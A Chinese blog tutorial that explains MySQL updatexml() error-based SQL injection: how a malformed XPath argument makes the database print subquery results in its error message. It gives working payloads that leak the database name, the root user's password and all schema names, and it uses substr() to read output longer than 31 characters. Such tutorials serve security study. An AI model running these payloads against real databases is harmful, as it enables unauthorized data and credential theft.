updatexml报错注入原理分析

++《网络安全自学教程》++

SQL注入时,经常利用updatexml()的报错特性来脱库。

updatexml报错原理

updatexml() 的作用是修改xml文件的内容。

1、updatexml语法参数

updatexml(参数1,参数2,参数3)

  • 参数1: 文件名,比如 a.xm
  • 参数2:路径,比如 contry->city1
  • 参数3:替换的值内容,比如 tianjing

就是把 a.xm 文件中 contry->city1 标签的值改成 tianjing

2、报错原理分析

参数2 的路径必须符合 XML 的 Xpath 语法,否则就会报错,提示你语法错误,并且把报错位置的内容显示出来。

比如我给参数2一个特殊符号~,它就会把这个特殊符号显示出来。

​​​​​​​​​​​​

如果函数里还有函数,他就会先执行里面的那个函数,类似小学数学里提到的"先算括号内,再算括号外",利用这个特性,我们在updatexml()里插入别的函数。

sql 复制代码
select updatexml(1,concat('~',database()),3);
  1. 它会先执行最里面的 database() ,查看到前使用的数据库是test。
sql 复制代码
select updatexml(1,concat('~',test),3);
  1. 再执行 concat() ,拼接成~test
sql 复制代码
select updatexml(1,'~test',3);
  1. 再执行updatexml(),一看参数2是 ~test,不符合Xpath语法,就报语法错误,停止执行SQL,然后把报错位置的参数显示出来。像下图的执行结果那样,我们就拿到了当前使用的数据库。

3、使用updatexml()脱库

按照上一步的逻辑,在函数中再插入括号,括号里写SQL语句,就能执行任意SQL,比如:查看root用户的密码。

sql 复制代码
select updatexml(1,concat('~',
(select password from user where username='root')
),3);

插入脱库语法来脱裤。

sql 复制代码
select updatexml(1,
concat('~',(
select group_concat(schema_name) 
from information_schema.schemata
)),3);

这里大家能注意到,我文章中的SQL故意换行了,这个换行不是语法要求,是给你自己看的,否则嵌套这么多括号,很容易写错。

4、分割显示结果

updatexml() 显示的报错内容字符串,最大长度是31个字符。脱库的结果显示不全,我们可以用 substr() 截取不同位置的字符串,分别显示出来。

比如:从第1个字符开始,截取31个字符。

sql 复制代码
select updatexml(1,concat('~',
substr(
(select group_concat(schema_name) 
from information_schema.schemata)
,1,31)
),3);

从第32个字符开始,截取31个字符。

sql 复制代码
select updatexml(1,concat('~',
substr(
(select group_concat(schema_name) 
from information_schema.schemata)
,32,31)
),3);

直到显示完所有字符。

相关推荐
卷Java4 小时前
违规通知功能修改说明
java·数据库·微信小程序·uni-app
带娃的IT创业者5 小时前
第4集:配置管理的艺术:环境变量、多环境配置与安全实践
开发语言·python·安全·项目配置·开发基础
养生技术人5 小时前
Oracle OCP认证考试题目详解082系列第54题
数据库·sql·oracle·运维开发·database·开闭原则·ocp
合作小小程序员小小店5 小时前
Web渗透之一句话木马
web安全·网络安全·安全威胁分析·安全架构·安全性测试
数据知道6 小时前
Go基础:用Go语言操作MongoDB详解
服务器·开发语言·数据库·后端·mongodb·golang·go语言
爱喝白开水a6 小时前
2025时序数据库选型,从架构基因到AI赋能来解析
开发语言·数据库·人工智能·架构·langchain·transformer·时序数据库
white-persist6 小时前
Burp Suite模拟器抓包全攻略
前端·网络·安全·web安全·notepad++·原型模式
羊锦磊6 小时前
[ Redis ] 数据结构储存系统
数据库·redis·缓存
m0_741585357 小时前
网站框架
数据库